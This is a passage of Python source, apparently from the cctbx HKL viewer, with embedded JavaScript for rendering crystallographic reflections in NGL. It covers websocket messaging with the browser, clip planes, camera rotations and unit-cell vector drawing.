var r1 = new Float32Array(3);
var r2 = new Float32Array(3);
var rgb = new Float32Array(3);
var elmstrs = strs[0].split(",");
for (j=0; j<3; j++)
{
r1[j] = parseFloat(elmstrs[j]);
r2[j] = parseFloat(elmstrs[j+3]);
rgb[j]= parseFloat(elmstrs[j+6]);
}
vectorshape.addArrow( r1, r2 , [rgb[0], rgb[1], rgb[2]], 0.15);
if (elmstrs[6] !== "") {
var txtR = [ r1[0] + r2[0], r1[1] + r2[1], r1[2] + r2[2] ];
vectorshape.addText( txtR, [rgb[0], rgb[1], rgb[2]], fontsize/2.0, elmstrs[9] );
}
// if reprname is supplied with a vector then make a representation named reprname
// of this and all pending vectors stored in vectorshape and render them.
// Otherwise just accummulate the new vector
var reprname = elmstrs[10].trim();
if (reprname != "")
{
vectorshapeComps.push( stage.addComponentFromObject(vectorshape) );
vectorreprs.push(
vectorshapeComps[vectorshapeComps.length-1].addRepresentation('vecbuf',
{ name: reprname} )
);
stage.viewer.requestRender();
}
}
if (msgtype === "RemoveVectors")
{
strs = datval[1].split("\\n");
var elmstrs = strs[0].split(",");
var reprname = elmstrs[0].trim();
// if reprname is supplied only remove vectors with that name
if (reprname != "")
{
thisrepr = stage.getRepresentationsByName(reprname);
for (i=0; i<stage.compList.length; i++)
if (stage.compList[i].reprList[0].name == reprname)
{
thiscomp = stage.compList[i];
thiscomp.removeRepresentation(thisrepr);
stage.removeComponent(thiscomp);
}
}
else // otherwise remove all vectors
{
for (i=0; i<vectorshapeComps.length; i++)
{
vectorshapeComps[i].removeRepresentation(vectorreprs[i]);
stage.removeComponent(vectorshapeComps[i]);
}
vectorshapeComps = [];
vectorreprs = [];
}
clipFixToCamPosZ = false;
stage.viewer.requestRender();
}
if (msgtype === "TooltipOpacity")
{
strs = datval[1].split("\\n");
var elmstrs = strs[0].split(",");
Object.assign(tooltip.style, {
backgroundColor: "rgba(255, 255, 255, " + elmstrs[0] + " )",
});
}
if (msgtype === "SetTrackBallRotateSpeed")
{
strs = datval[1].split("\\n");
var elmstrs = strs[0].split(",");
stage.trackballControls.rotateSpeed = parseFloat(elmstrs[0]);
}
if (msgtype === "GetTrackBallRotateSpeed")
{
msg = String( [stage.trackballControls.rotateSpeed] )
WebsockSendMsg('ReturnTrackBallRotateSpeed:\\n' + msg );
}
if (msgtype === "SetClipPlaneDistances")
{
strs = datval[1].split("\\n");
var elmstrs = strs[0].split(",");
var near = parseFloat(elmstrs[0]);
var far = parseFloat(elmstrs[1]);
origcameraZpos = parseFloat(elmstrs[2]);
stage.viewer.parameters.clipMode = 'camera';
stage.viewer.parameters.clipScale = 'absolute';
if (near >= far )
{ // default to no clipping if near >= far
stage.viewer.parameters.clipMode = 'scene';
stage.viewer.parameters.clipScale = 'relative';
near = -1000;
far = 1000;
}
stage.viewer.parameters.clipNear = near;
stage.viewer.parameters.clipFar = far;
origclipnear = near;
origclipfar = far;
clipFixToCamPosZ = true;
stage.viewer.camera.position.z = origcameraZpos;
stage.viewer.requestRender();
}
if (msgtype === "GetClipPlaneDistances")
{
msg = String( [stage.viewer.parameters.clipNear,
stage.viewer.parameters.clipFar,
stage.viewer.camera.position.z] )
WebsockSendMsg('ReturnClipPlaneDistances:\\n' + msg );
}
if (msgtype === "GetBoundingBox")
{
msg = String( [stage.viewer.boundingBoxSize.x,
stage.viewer.boundingBoxSize.y,
stage.viewer.boundingBoxSize.z]
)
WebsockSendMsg('ReturnBoundingBox:\\n' + msg );
}
if (msgtype === "InjectNewReflections")
{
WebsockSendMsg( 'Rendering new reflections ' + pagename );
var nrefl = parseInt(val.length/7);
if (nrefl !== val.length/7)
{
alert("Mismatch in array of reflections, colours and radii!")
return;
}
// delete the shapebufs[] that holds the positions[] arrays
shapeComp.removeRepresentation(repr);
// remove shapecomp from stage first
stage.removeComponent(shapeComp);
positions = [];
colours = [];
radii = [];
alphas = [];
shapebufs = [];
ttips = [];
shapebufs = [];
nbins = 1; // currently no binning when injecting reflections
positions_ = []; // dummy variables for conforming to binning scheme above
colours_ = []; // as used when expanding reflections
radii_ = [];
ttips_ = [-1]
for (j=0; j<nrefl; j++)
{
positions_.push( parseFloat(val[7*j]) );
positions_.push( parseFloat(val[7*j+1]) );
positions_.push( parseFloat(val[7*j+2]) );
colours_.push( parseFloat(val[7*j+3]) );
colours_.push( parseFloat(val[7*j+4]) );
colours_.push( parseFloat(val[7*j+5]) );
radii_.push( parseFloat(val[7*j+6]) );
ttips_.push(j)
}
positions.push( new Float32Array( positions_ ));
colours.push( new Float32Array( colours_ ));
radii.push( new Float32Array( radii_ ));
ttips.push(ttips_);
shapebufs.push( new NGL.SphereBuffer({
position: positions[0],
color: colours[0],
radius: radii[0],
picking: ttips[0],
})
);
shape.addBuffer(shapebufs[0]);
alphas.push(1.0);
MakeHKL_Axis(shape);
shapeComp = stage.addComponentFromObject(shape);
repr = shapeComp.addRepresentation('buffer');
stage.viewer.requestRender();
WebsockSendMsg('Injected new reflections');
}
if (msgtype === "Testing")
{
// test something new
WebsockSendMsg( 'Testing something new ' + pagename );
/*
var newradii = radii[0].map(function(element) {
return element*1.5;
});
shapebufs[0].setAttributes({
radius: newradii
})
repr = shapeComp.addRepresentation('buffer');
stage.viewer.requestRender();
*/
}
}
catch(err)
{
WebsockSendMsg('JavaScriptError: ' + err.stack );
}
};
""" %qualitystr
self.NGLscriptstr += WebsockMsgHandlestr
if self.jscriptfname:
with open( self.jscriptfname, "w") as f:
f.write( self.NGLscriptstr )
self.ReloadNGL()
if not blankscene:
self.GetClipPlaneDistances()
self.GetBoundingBox()
self.OrigClipFar = self.clipFar
self.OrigClipNear = self.clipNear
self.SetTrackBallRotateSpeed( self.ngl_settings.mouse_sensitivity )
self.sceneisdirty = False
def OnConnectWebsocketClient(self, client, server):
#if not self.websockclient:
self.websockclient = client
self.mprint( "Browser connected:" + str( self.websockclient ), verbose=1 )
#else:
# self.mprint( "Unexpected browser connection was rejected" )
def OnWebsocketClientMessage(self, client, server, message):
if self.viewerparams.scene_id is None or self.miller_array is None:
return
try:
if message != "":
if "Orientation" in message:
self.orientmessage = message
self.ProcessOrientationMessage()
else:
self.mprint( message, verbose=4)
self.lastmsg = message
if "JavaScriptError:" in message:
self.mprint( message, verbose=0)
#raise Sorry(message)
if "OrientationBeforeReload:" in message:
#sleep(0.2)
self.mprint( "Reorienting client after refresh:" + str( self.websockclient ), verbose=2 )
if not self.isnewfile:
self.viewmtrx = self.orientmessage[ self.orientmessage.find("\n") + 1: ]
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
self.msgqueue.append( ("ReOrient", self.viewmtrx) )
self.isnewfile = False
if "ReturnClipPlaneDistances:" in message:
datastr = message[ message.find("\n") + 1: ]
lst = datastr.split(",")
flst = [float(e) for e in lst]
self.clipNear = flst[0]
self.clipFar = flst[1]
self.cameraPosZ = flst[2]
self.params.clip_plane.clipwidth = None
if "ReturnBoundingBox:" in message:
datastr = message[ message.find("\n") + 1: ]
lst = datastr.split(",")
flst = [float(e) for e in lst]
self.boundingX = flst[0]
self.boundingY = flst[1]
self.boundingZ = flst[2]
if "ReturnTrackBallRotateSpeed" in message:
datastr = message[ message.find("\n") + 1: ]
lst = datastr.split(",")
flst = [float(e) for e in lst]
self.ngl_settings.mouse_sensitivity = flst[0]
if "tooltip_id:" in message:
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
sym_id = eval(message.split("tooltip_id:")[1])[0]
id = eval(message.split("tooltip_id:")[1])[1]
is_friedel_mate = eval(message.split("tooltip_id:")[1])[2]
rotmx = None
if sym_id >= 0 and sym_id < len(self.symops):
rotmx = self.symops[sym_id].r()
hkls = self.scene.indices
if not is_friedel_mate:
ttip = self.GetTooltipOnTheFly(id, rotmx)
else:
# if id > len(hkls) then these hkls are added as the friedel mates during the
# "if (anoexp)" condition in the javascript code
id = id % len(hkls)
ttip = "id: %d" %id
#ttip = self.GetTooltipOnTheFly(hkls[id], rotmx, anomalous=True)
ttip = self.GetTooltipOnTheFly(id, rotmx, anomalous=True)
self.SendMsgToBrowser("ShowTooltip", ttip)
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
except Exception as e:
self.mprint( to_str(e) + "\n" + traceback.format_exc(limit=10), verbose=0)
def ProcessOrientationMessage(self):
if self.orientmessage is None:
return
if self.orientmessage.find("NaN")>=0:
return
self.viewmtrx = self.orientmessage[ self.orientmessage.find("\n") + 1: ]
lst = self.viewmtrx.split(",")
flst = [float(e) for e in lst]
ScaleRotMx = matrix.sqr( (flst[0], flst[4], flst[8],
flst[1], flst[5], flst[9],
flst[2], flst[6], flst[10]
)
)
self.cameratranslation = (flst[12], flst[13], flst[14])
self.mprint("translation: %s" %str(roundoff(self.cameratranslation)), verbose=3)
self.cameradist = math.pow(ScaleRotMx.determinant(), 1.0/3.0)
self.mprint("distance: %s" %roundoff(self.cameradist), verbose=3)
self.rotation_mx = ScaleRotMx/self.cameradist
rotlst = roundoff(self.rotation_mx.elems)
self.mprint("""Rotation matrix:
%s, %s, %s
%s, %s, %s
%s, %s, %s
""" %rotlst, verbose=3)
alllst = roundoff(flst)
self.mprint("""OrientationMatrix matrix:
%s, %s, %s, %s
%s, %s, %s, %s
%s, %s, %s, %s
%s, %s, %s, %s
""" %tuple(alllst), verbose=4)
self.params.mouse_moved = True
if self.rotation_mx.is_r3_rotation_matrix():
angles = self.rotation_mx.r3_rotation_matrix_as_x_y_z_angles(deg=True)
self.mprint("angles: %s" %str(roundoff(angles)), verbose=3)
z_vec = flex.vec3_double( [(0,0,1)])
self.rot_zvec = z_vec * self.rotation_mx
self.mprint("Rotated cartesian Z direction : %s" %str(roundoff(self.rot_zvec[0])), verbose=3)
rfracmx = matrix.sqr( self.miller_array.unit_cell().reciprocal().fractionalization_matrix() )
self.rot_recip_zvec = self.rot_zvec * rfracmx
self.rot_recip_zvec = (1.0/self.rot_recip_zvec.norm()) * self.rot_recip_zvec
self.mprint("Rotated reciprocal L direction : %s" %str(roundoff(self.rot_recip_zvec[0])), verbose=3)
def WaitforHandshake(self, sec):
nwait = 0
while not self.websockclient:
time.sleep(self.sleeptime)
nwait += self.sleeptime
if nwait > sec:
return False
return True
def WebBrowserMsgQueue(self):
try:
while True:
nwait = 0.0
sleep(self.sleeptime)
if len(self.msgqueue):
pendingmessagetype, pendingmessage = self.msgqueue[0]
self.SendMsgToBrowser(pendingmessagetype, pendingmessage)
while not (self.browserisopen and self.websockclient):
sleep(self.sleeptime)
nwait += self.sleeptime
if nwait > self.handshakewait and self.browserisopen:
self.mprint("ERROR: No handshake from browser! Security settings may have to be adapted", verbose=0 )
return
#break
self.msgqueue.remove( self.msgqueue[0] )
# if the html content is huge the browser will be unresponsive until it has finished
# reading the html content. This may crash this thread. So try restarting this thread until
# browser is ready
except Exception as e:
self.mprint( str(e) + ", Restarting WebBrowserMsgQueue\n" \
+ traceback.format_exc(limit=10), verbose=2)
self.WebBrowserMsgQueue()
def SendMsgToBrowser(self, msgtype, msg=""):
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
#print "self.server.clients: ", self.server.clients
#print "self.websockclient: ",
message = u"" + msgtype + self.msgdelim + str(msg)
if self.websockclient:
nwait = 0.0
while not ("Ready" in self.lastmsg or "tooltip_id" in self.lastmsg \
or "CurrentViewOrientation" in self.lastmsg):
sleep(self.sleeptime)
nwait += self.sleeptime
if nwait > self.handshakewait and self.browserisopen:
break
self.server.send_message(self.websockclient, message )
else:
self.OpenBrowser()
def StartWebsocket(self):
self.server = WebsocketServer(self.websockport, host='127.0.0.1')
if not self.server:
raise Sorry("Could not connect to web browser")
self.server.set_fn_new_client(self.OnConnectWebsocketClient)
self.server.set_fn_message_received(self.OnWebsocketClientMessage)
self.wst = threading.Thread(target=self.server.run_forever)
self.wst.daemon = True
self.wst.start()
self.msgqueuethrd = threading.Thread(target = self.WebBrowserMsgQueue )
self.msgqueuethrd.daemon = True
self.msgqueuethrd.start()
def set_camera_type(self):
self.camera_type = self.ngl_settings.camera_type
def set_tooltip_opacity(self):
msg = "%f" %self.ngl_settings.tooltip_alpha
self.SendMsgToBrowser("TooltipOpacity", msg)
def SetOpacities(self, bin_opacities_str):
retstr = ""
if self.miller_array and bin_opacities_str and not self.isinjected:
self.ngl_settings.bin_opacities = bin_opacities_str
bin_opacitieslst = eval(self.ngl_settings.bin_opacities)
for binopacity in bin_opacitieslst:
alpha = binopacity[0] # float(binopacity.split(",")[0])
bin = binopacity[1] # int(binopacity.split(",")[1])
retstr += self.set_opacity(bin, alpha)
self.SendInfoToGUI( { "bin_opacities": self.ngl_settings.bin_opacities } )
return retstr
def set_opacity(self, bin, alpha):
if bin > self.nbinvalsboundaries-1:
return "There are only %d bins present\n" %self.nbinvalsboundaries
msg = "%d, %f" %(bin, alpha)
self.SendMsgToBrowser("alpha", msg)
return "Opacity %s set on bin[%s]\n" %(alpha, bin)
def RedrawNGL(self):
#self.SendMsgToBrowser("Redraw")
self.msgqueue.append( ("Redraw", "") )
def ReloadNGL(self): # expensive as javascript may be several Mbytes large
self.mprint("Rendering JavaScript...", verbose=1)
#self.SendMsgToBrowser("Reload")
self.msgqueue.append( ("Reload", "") )
def OpenBrowser(self):
if not self.browserisopen:
#NGLlibpath = libtbx.env.under_root(os.path.join("modules","cctbx_project","crys3d","hklview","ngl.js") )
NGLlibpath = libtbx.env.under_root(os.path.join("modules","cctbx_project","crys3d","hklview","ngl.dev.js") )
htmlstr = self.hklhtml %(NGLlibpath, os.path.abspath( self.jscriptfname))
htmlstr += self.htmldiv
with open(self.hklfname, "w") as f:
f.write( htmlstr )
self.url = "file:///" + os.path.abspath( self.hklfname )
self.url = self.url.replace("\\", "/")
self.mprint( "Writing %s and connecting to its websocket client" %self.hklfname, verbose=1)
if self.UseOSBrowser:
webbrowser.open(self.url, new=1)
self.SendInfoToGUI({ "html_url": self.url } )
self.isnewfile = False
self.browserisopen = True
def ExpandInBrowser(self, P1=True, friedel_mate=True):
retmsg = "Not expanding in browser\n"
if self.sceneisdirty:
return retmsg
uc = self.miller_array.unit_cell()
OrtMx = matrix.sqr( uc.orthogonalization_matrix())
InvMx = OrtMx.inverse()
msgtype = "Expand"
msg = ""
unique_rot_ops = []
if P1:
msgtype += "P1"
unique_rot_ops = self.symops[ 0 : self.sg.order_p() ] # avoid duplicate rotation matrices
retmsg = "Expanding to P1 in browser\n"
if not self.miller_array.is_unique_set_under_symmetry():
retmsg += "Not all reflections are in the same asymmetric unit in reciprocal space.\n"
retmsg += "Some reflections might be displayed on top of one another.\n"
else:
unique_rot_ops = [ self.symops[0] ] # No P1 expansion. So only submit the identity matrix
if friedel_mate and not self.miller_array.anomalous_flag():
msgtype += "Friedel"
retmsg = "Expanding Friedel mates in browser\n"
for i, symop in enumerate(unique_rot_ops):
RotMx = matrix.sqr( symop.r().as_double())
ortrot = (OrtMx * RotMx * InvMx).as_mat3()
if RotMx.is_r3_identity_matrix():
# avoid machine precision rounding errors converting 1.0 to 0.99999999..
ortrot = (1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0)
str_rot = str(ortrot)
str_rot = str_rot.replace("(", "")
str_rot = str_rot.replace(")", "")
msg += str_rot + "\n"
self.msgqueue.append( (msgtype, msg) )
self.GetBoundingBox() # bounding box changes when the extent of the displayed lattice changes
return retmsg
def AddVector(self, s1, s2, s3, t1, t2, t3, isreciprocal=True, label="",
r=0, g=0, b=0, name=""):
"""
Place vector from {s1, s2, s3] to [t1, t2, t3] with colour r,g,b and label
If name=="" creation is deferred until AddVector is eventually called with name != ""
These vectors are then joined in the same NGL representation
"""
uc = self.miller_array.unit_cell()
vec1 = (s1*self.scene.renderscale, s2*self.scene.renderscale, s3*self.scene.renderscale)
vec2 = (t1*self.scene.renderscale, t2*self.scene.renderscale, t3*self.scene.renderscale)
#svec = list(vec)
if isreciprocal:
# uc.reciprocal_space_vector() only takes integer miller indices so compute
# the cartesian coordinates for real valued miller indices with the transpose of the fractionalization matrix
vec1 = list( vec1 * matrix.sqr(uc.fractionalization_matrix()).transpose() )
vec2 = list( vec2 * matrix.sqr(uc.fractionalization_matrix()).transpose() )
svec1 = [ vec1[0], vec1[1], vec1[2] ]
svec2 = [ vec2[0], vec2[1], vec2[2] ]
else:
vec1 = list( vec1 * matrix.sqr(uc.orthogonalization_matrix()) )
vec2 = list( vec2 * matrix.sqr(uc.orthogonalization_matrix()) )
vscale = 200.0/uc.volume()
# TODO: find suitable scale factor for displaying real space vector together with reciprocal vectors
svec1 = [ vscale*vec1[0], vscale*vec1[1], vscale*vec1[2] ]
svec2 = [ vscale*vec2[0], vscale*vec2[1], vscale*vec2[2] ]
self.mprint("cartesian vector is: %s to %s" %(str(roundoff(svec1)), str(roundoff(svec2))), verbose=1)
svec = [svec2[0]-svec1[0], svec2[1]-svec1[1], svec2[2]-svec1[2] ]
xyvec = svec[:] # deep copying
xyvec[2] = 0.0 # projection vector of svec in the xy plane
xyvecnorm = math.sqrt( xyvec[0]*xyvec[0] + xyvec[1]*xyvec[1] )
if xyvecnorm > 0.0:
angle_x_xyvec = math.acos( xyvec[0]/xyvecnorm )*180.0/math.pi
angle_y_xyvec = math.acos( xyvec[1]/xyvecnorm )*180.0/math.pi
else:
angle_x_xyvec = 90.0
angle_y_xyvec = 90.0
yzvec = svec[:]
yzvec[0] = 0.0 # projection vector of svec in the yz plane
yzvecnorm = math.sqrt( yzvec[1]*yzvec[1] + yzvec[2]*yzvec[2] )
if yzvecnorm > 0.0:
angle_y_yzvec = math.acos( yzvec[1]/yzvecnorm )*180.0/math.pi
angle_z_yzvec = math.acos( yzvec[2]/yzvecnorm )*180.0/math.pi
else:
angle_y_yzvec = 90.0
angle_z_yzvec = 90.0
svecnorm = math.sqrt( svec[0]*svec[0] + svec[1]*svec[1] + svec[2]*svec[2] )
angle_x_svec = math.acos( svec[0]/svecnorm )*180.0/math.pi
angle_y_svec = math.acos( svec[1]/svecnorm )*180.0/math.pi
angle_z_svec = math.acos( svec[2]/svecnorm )*180.0/math.pi
if angle_y_svec > 90.0:
angle_x_xyvec = -angle_x_xyvec
self.mprint("angles in xy plane to x,y axis are: %s, %s" %(angle_x_xyvec, angle_y_xyvec), verbose=2)
self.mprint("angles in yz plane to y,z axis are: %s, %s" %(angle_y_yzvec, angle_z_yzvec), verbose=2)
self.mprint("angles to x,y,z axis are: %s, %s, %s" %(angle_x_svec, angle_y_svec, angle_z_svec ), verbose=2)
self.msgqueue.append( ("AddVector", "%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s" \
%tuple(svec1 + svec2 + [r, g, b, label, name]) ))
return angle_x_xyvec, angle_z_svec
def PointVectorPerpendicularToClipPlane(self):
rotmx = self.Euler2RotMatrix(( self.angle_x_xyvec, self.angle_z_svec, 0.0 ))
if rotmx.determinant() < 0.99999:
self.mprint("Rotation matrix determinant is less than 1")
return rotmx
self.RotateMxStage(rotmx)
return rotmx
def PointVectorParallelToClipPlane(self):
rotmx = self.Euler2RotMatrix(( self.angle_x_xyvec, self.angle_z_svec+90.0, 90.0 ))
if rotmx.determinant() < 0.99999:
self.mprint("Rotation matrix determinant is less than 1")
return rotmx
self.RotateMxStage(rotmx)
return rotmx
def RotateAroundFracVector(self, phi, r1,r2,r3, prevrotmx = matrix.identity(3), quietbrowser=True):
# Assuming vector is in real space fractional coordinates turn it into cartesian
cartvec = list( (r1,r2,r3) * matrix.sqr(self.miller_array.unit_cell().orthogonalization_matrix()) )
# Rodrigues rotation formula for rotation by phi angle around a vector going through origo
# See http://mathworld.wolfram.com/RodriguesRotationFormula.html
# \mathbf I+\left(\sin\,\varphi\right)\mathbf W+\left(2\sin^2\frac{\varphi}{2}\right)\mathbf W^2
normR = math.sqrt(cartvec[0]*cartvec[0] + cartvec[1]*cartvec[1] + cartvec[2]*cartvec[2] )
ux = cartvec[0]/normR
uy = cartvec[1]/normR
uz = cartvec[2]/normR
W = matrix.sqr([0, -uz, uy, uz, 0, -ux, -uy, ux, 0])
#W = matrix.sqr([0, uz, -uy, -uz, 0, ux, uy, -ux, 0])
I = matrix.identity(3)
sin2phi2 = math.sin(phi/2)
sin2phi2 *= sin2phi2
RotMx = I + math.sin(phi)*W + 2* sin2phi2 * W*W
RotMx = RotMx * prevrotmx # impose any other rotation already performed
self.RotateMxStage(RotMx, quietbrowser)
return RotMx, [ux, uy, uz]
def SpinAnimate(self, r1, r2, r3):
self.msgqueue.append(("SpinAnimate", "%s, %s, %s" %(r1, r2, r3) ))
def DrawUnitCell(self):
self.AddVector(0,0,0, 1,0,0, False, label="200a/V", r=0.5, g=0.8, b=0.8)
self.AddVector(0,0,0, 0,1,0, False, label="200b/V", r=0.8, g=0.5, b=0.8)
self.AddVector(0,0,0, 0,0,1, False, label="200c/V", r=0.8, g=0.8, b=0.5)
self.AddVector(1,0,0, 1,1,0, False, r=0.8, g=0.5, b=0.8)
self.AddVector(0,1,0, 1,1,0, False, r=0.5, g=0.8, b=0.8)
self.AddVector(0,0,1, 1,0,1, False, r=0.5, g=0.8, b=0.8)
self.AddVector(0,0,1, 0,1,1, False, r=0.8, g=0.5, b=0.8)
self.AddVector(0,1,1, 1,1,1, False, r=0.5, g=0.8, b=0.8)
self.AddVector(1,0,1, 1,1,1, False, r=0.8, g=0.5, b=0.8)
self.AddVector(1,0,0, 1,0,1, False, r=0.8, g=0.8, b=0.5)
self.AddVector(0,1,0, 0,1,1, False, r=0.8, g=0.8, b=0.5)
self.AddVector(1,1,0, 1,1,1, False, r=0.8, g=0.8, b=0.5, name="unitcell")
def DrawReciprocalUnitCell(self):
n=2
self.AddVector(0,0,0, n,0,0, label="2a*", r=0.5, g=0.3, b=0.3)
self.AddVector(0,0,0, 0,n,0, label="2b*", r=0.3, g=0.5, b=0.3)
self.AddVector(0,0,0, 0,0,n, label="2c*", r=0.3, g=0.3, b=0.5)
self.AddVector(n,0,0, n,n,0, r=0.3, g=0.5, b=0.3)
self.AddVector(0,n,0, n,n,0, r=0.5, g=0.3, b=0.3)
self.AddVector(0,0,n, n,0,n, r=0.5, g=0.3, b=0.3)
self.AddVector(0,0,n, 0,n,n, r=0.3, g=0.5, b=0.3)
self.AddVector(0,n,n, n,n,n, r=0.5, g=0.3, b=0.3)
self.AddVector(n,0,n, n,n,n, r=0.3, g=0.5, b=0.3)
self.AddVector(n,0,0, n,0,n, r=0.3, g=0.3, b=0.5)
self.AddVector(0,n,0, 0,n,n, r=0.3, g=0.3, b=0.5)
self.AddVector(n,n,0, n,n,n, r=0.3, g=0.3, b=0.5, name="reciprocal_unitcell")
def fix_orientation(self, val):
if val:
self.DisableMouseRotation()
else:
self.EnableMouseRotation()
def clip_plane_hkl_vector(self, h, k, l, hkldist=0.0,
clipwidth=None, fixorientation=True, is_parallel=False):
# create clip plane that is normal to the reciprocal hkl vector
if h==0.0 and k==0.0 and l==0.0 or clipwidth <= 0.0:
self.RemoveVectorsNoClipPlane()
return
self.RemoveVectors("clip_vector")
R = -l * self.normal_hk + h * self.normal_kl + k * self.normal_lh
self.angle_x_xyvec, self.angle_z_svec = self.AddVector(0, 0, 0,
R[0][0], R[0][1], R[0][2], isreciprocal=False,
name="clip_vector")
if fixorientation:
self.DisableMouseRotation()
else:
self.EnableMouseRotation()
if is_parallel:
self.vecrotmx = self.PointVectorParallelToClipPlane()
else:
self.vecrotmx = self.PointVectorPerpendicularToClipPlane()
halfdist = -self.cameraPosZ - hkldist # self.viewer.boundingZ*0.5
if clipwidth is None:
clipwidth = self.meanradius
clipNear = halfdist - clipwidth # 50/self.viewer.boundingZ
clipFar = halfdist + clipwidth #50/self.viewer.boundingZ
self.SetClipPlaneDistances(clipNear, clipFar, self.cameraPosZ)
self.TranslateHKLpoints(R[0][0], R[0][1], R[0][2], hkldist)
self.DrawUnitCell()
self.DrawReciprocalUnitCell()
def clip_plane_abc_vector(self, a, b, c, hkldist=0.0,
clipwidth=None, fixorientation=True, is_parallel=False):
# create clip plane that is normal to the realspace fractional abc vector
if a==0.0 and b==0.0 and c==0.0 or clipwidth <= 0.0:
self.RemoveVectorsNoClipPlane()
return
self.RemoveVectors("clip_vector")
self.angle_x_xyvec, self.angle_z_svec = self.AddVector(0, 0, 0,
a, b, c, isreciprocal=False, name="clip_vector")
if fixorientation:
self.DisableMouseRotation()
else:
self.EnableMouseRotation()
if is_parallel:
self.vecrotmx = self.PointVectorParallelToClipPlane()
else:
self.vecrotmx = self.PointVectorPerpendicularToClipPlane()
halfdist = -self.cameraPosZ - hkldist # self.viewer.boundingZ*0.5
if clipwidth is None:
clipwidth = self.meanradius
clipNear = halfdist - clipwidth # 50/self.viewer.boundingZ
clipFar = halfdist + clipwidth #50/self.viewer.boundingZ
self.SetClipPlaneDistances(clipNear, clipFar, self.cameraPosZ)
self.DrawUnitCell()
self.DrawReciprocalUnitCell()
def clip_plane_to_HKL_vector(self, h, k, l, hkldist=0.0,
clipwidth=None, fixorientation=True):
if h==0.0 and k==0.0 and l==0.0 or clipwidth==None:
self.RemoveVectorsNoClipPlane()
return
self.RemoveVectors("clip_vector")
self.angle_x_xyvec, self.angle_z_svec = self.AddVector(0, 0, 0,
h, k, l, isreciprocal=False,
name="clip_vector")
if fixorientation:
self.DisableMouseRotation()
else:
self.EnableMouseRotation()
self.PointVectorPerpendicularToClipPlane()
halfdist = -self.cameraPosZ - hkldist # self.viewer.boundingZ*0.5
if clipwidth is None:
clipwidth = self.meanradius
clipNear = halfdist - clipwidth # 50/self.viewer.boundingZ
clipFar = halfdist + clipwidth #50/self.viewer.boundingZ
self.SetClipPlaneDistances(clipNear, clipFar, self.cameraPosZ)
self.TranslateHKLpoints(h,k,l, hkldist)
def RemoveVectorsNoClipPlane(self):
self.EnableMouseRotation()
self.RemoveVectors()
self.SetClipPlaneDistances(0, 0)
self.TranslateHKLpoints(0, 0, 0, 0.0)
def SetTrackBallRotateSpeed(self, trackspeed):
msg = str(trackspeed)
self.msgqueue.append( ("SetTrackBallRotateSpeed", msg) )
self.GetTrackBallRotateSpeed()
def GetTrackBallRotateSpeed(self):
self.ngl_settings.mouse_sensitivity = None
self.msgqueue.append( ("GetTrackBallRotateSpeed", "") )
if self.WaitforHandshake(5):
nwait = 0
while self.ngl_settings.mouse_sensitivity is None and nwait < 5:
time.sleep(self.sleeptime)
nwait += self.sleeptime
def SetClipPlaneDistances(self, near, far, cameraPosZ=None):
if cameraPosZ is None:
cameraPosZ = self.cameraPosZ
msg = str(near) + ", " + str(far) + ", " + str(cameraPosZ)
self.msgqueue.append( ("SetClipPlaneDistances", msg) )
def GetClipPlaneDistances(self):
self.clipNear = None
self.clipFar = None
self.cameraPosZ = None
self.msgqueue.append( ("GetClipPlaneDistances", "") )
if self.WaitforHandshake(5):
nwait = 0
while self.clipFar is None and nwait < 5:
time.sleep(self.sleeptime)
nwait += self.sleeptime
self.mprint("clipnear, clipfar, cameraPosZ: %s, %s %s" \
%(self.clipNear, self.clipFar, self.cameraPosZ), 2)
return (self.clipNear, self.clipFar, self.cameraPosZ)
def GetBoundingBox(self):
self.boundingX = 0.0
self.boundingY = 0.0
self.boundingZ = 0.0
self.msgqueue.append( ("GetBoundingBox", "") )
if self.WaitforHandshake(5):
nwait = 0
while self.boundingX is None and nwait < 5:
time.sleep(self.sleeptime)
nwait += self.sleeptime
self.mprint("boundingXYZ: %s, %s %s" \
%(self.boundingX, self.boundingY, self.boundingZ), verbose=2)
return (self.boundingX, self.boundingY, self.boundingZ)
def RemoveVectors(self, reprname=""):
self.msgqueue.append( ("RemoveVectors", reprname ))
def TestNewFunction(self):
self.SendMsgToBrowser("Testing")
def DisableMouseRotation(self): # disable rotating with the mouse
self.SendMsgToBrowser("DisableMouseRotation")
def EnableMouseRotation(self): # enable rotating with the mouse
self.SendMsgToBrowser("EnableMouseRotation")
def Euler2RotMatrix(self, eulerangles):
eulerangles1 = eulerangles
radangles = [e*math.pi/180.0 for e in eulerangles1]
RotMx = scitbx.math.euler_angles_as_matrix(radangles)
return RotMx
def RotateMxStage(self, rotmx, quietbrowser=True):
scaleRot = rotmx * self.cameradist
ortrot = scaleRot.as_mat3()
str_rot = str(ortrot)
str_rot = str_rot.replace("(", "")
str_rot = str_rot.replace(")", "")
msg = str_rot + ", quiet\n"
if not quietbrowser:
msg = str_rot + ", verbose\n"
self.msgqueue.append( ("RotateStage", msg) )
def TranslateHKLpoints(self, h, k, l, mag):
# cast this reciprocal vector into cartesian before messaging NGL to translate our HKL points
#vec = self.miller_array.unit_cell().reciprocal_space_vector((h, k, l))
hkl_vec = flex.vec3_double( [(h,k,l)])
rfracmx = matrix.sqr( self.miller_array.unit_cell().reciprocal().orthogonalization_matrix() )
cartvec = hkl_vec * rfracmx
if cartvec.norm()==0.0 or mag==0.0:
svec = (0, 0, 0)
else:
#cartvec = (mag/cartvec.norm()) * cartvec
cartvec = (-mag*self.scene.renderscale/hkl_vec.norm()) * cartvec
#svec = [cartvec[0][0]*self.scene.renderscale, cartvec[0][1]*self.scene.renderscale, cartvec[0][2]*self.scene.renderscale ]
svec = cartvec[0]
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
self.mprint("cartesian translation vector is: " + str(roundoff(svec)), verbose=1)
str_vec = str(svec)
str_vec = str_vec.replace("(", "")
str_vec = str_vec.replace(")", "")
msg = str_vec + "\n"
self.msgqueue.append( ("TranslateHKLpoints", msg) )
def InjectNewReflections(self, proc_array):
(hklscenes, scenemaxdata,
scenemindata, scenemaxsigmas,
sceneminsigmas, scenearrayinfos
) = MakeHKLscene(proc_array, 0, copy.deepcopy(self.settings), { } , None)
strdata = ""
hklscene = hklscenes[0]
